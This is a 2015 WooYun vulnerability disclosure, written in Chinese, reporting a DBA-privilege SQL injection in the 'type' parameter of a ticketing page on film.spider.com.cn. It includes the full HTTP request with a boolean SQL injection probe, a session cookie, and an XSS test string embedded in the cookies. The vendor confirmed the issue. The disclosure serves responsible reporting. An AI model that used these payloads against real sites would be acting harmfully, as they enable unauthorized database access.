当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142466

漏洞标题:万丰文化某站存在DBA权限SQL注射

相关厂商:万丰文化

漏洞作者: 我不是冰冰

提交时间:2015-09-21 11:26

修复时间:2015-11-05 15:34

公开时间:2015-11-05 15:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-21: 厂商已经确认,细节仅向厂商公开
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

DBA

详细说明:

POST /tickdating.html?order=&type=m'%20AND%203*2*1%3d6%20AND%20'000XaSG'%3d'000XaSG&_pageNo=3 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://film.spider.com.cn:80/
Cookie: JSESSIONID=AB8AA952747E2EE612CBACC3E3F71121; utm_source=zhijie; utm_medium=zhijie; utm_campaign=""; utm_group=""; utm_keywords=""; nooverride=""; utm_content=""; utm_code=""; NSC_WT_gjmn.tqjefs.dpn.do_80=ffffffffc3a0146d45525d5f4f58455e445a4a42297d; ticket_cookie_cinema=31126001; spider_customer_cinemaid=%2C31051101%2C31125901%2CDX20002824%2C; spider_customer_filmid=%2C201508554006%2C201507615107%2C201508921406%2C; partner_customer_cookie=0Z2MJ4KXN2G0D; ticket_cookie_area=baoding; __utmt=1; __utma=59518959.330485668.1442748667.1442748667.1442748667.1; __utmb=59518959.7.10.1442748667; __utmc=59518959; __utmz=59518959.1442748667.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); Hm_lvt_3d3e43b633d223430d8d11a0f3c22e06=1442749395,1442749798,1442750046,1442751065; Hm_lpvt_3d3e43b633d223430d8d11a0f3c22e06=1442751065; _ga=GA1.3.330485668.1442748667; _gat=1; HMACCOUNT=6F1075089C3067C1; NSC_WT_qjd.tqjefs.dpn.do_80=ffffffffc3a0149345525d5f4f58455e445a4a423660; __cfduid=d7ece5cf530d6394ddb8aa249c1aed31e1442748683; NDZT74129215LR_cookie_t0=1; bfd_s=59518959.28512722.1442748904039; tmc=3.59518959.71833251.1442748904041.1442749801378.1442751064695; tma=59518959.71833251.1442748904041.1442748904041.1442748904041.1; tmd=3.59518959.71833251.1442748904041.; bfd_g=a7fcd4ae5266aa77000078a2007c16fc55fe99fc; NDZT74129215LR_hasInstall=0; LiveWSDZT74129215=1442748925624594581669; LiveWSDZT74129215sessionid=1442748925624594581669; NDZT74129215fistvisitetime=1442748993732; NDZT74129215lastvisitetime=1442749801493; NDZT74129215visitecounts=1; NDZT74129215visitepages=2; Hm_lvt_d6211722f54a6f54990f134e24099aad=1442749150; Hm_lpvt_d6211722f54a6f54990f134e24099aad=1442749150; bdshare_firstime=1442749151176; BAIDUID=AAB504DF79C8A47842BFE4A33BCF1FC4:FG=1; bfdid=a7fcd4ae5266aa77000078a2007c16fc55fe99fc; filmscorecount=1; filmcommentcount=10; shorcommentcount=1; cinemascorecount=1
Host: film.spider.com.cn
Content-Length: 0
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


参数:type

漏洞证明:

z.png

x.png

c.png

时间关系先跑到这,强调问题所在先;

修复方案:

过滤;

版权声明:转载请注明来源 我不是冰冰@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-21 15:33

厂商回复:

漏洞确认中...

最新状态:

暂无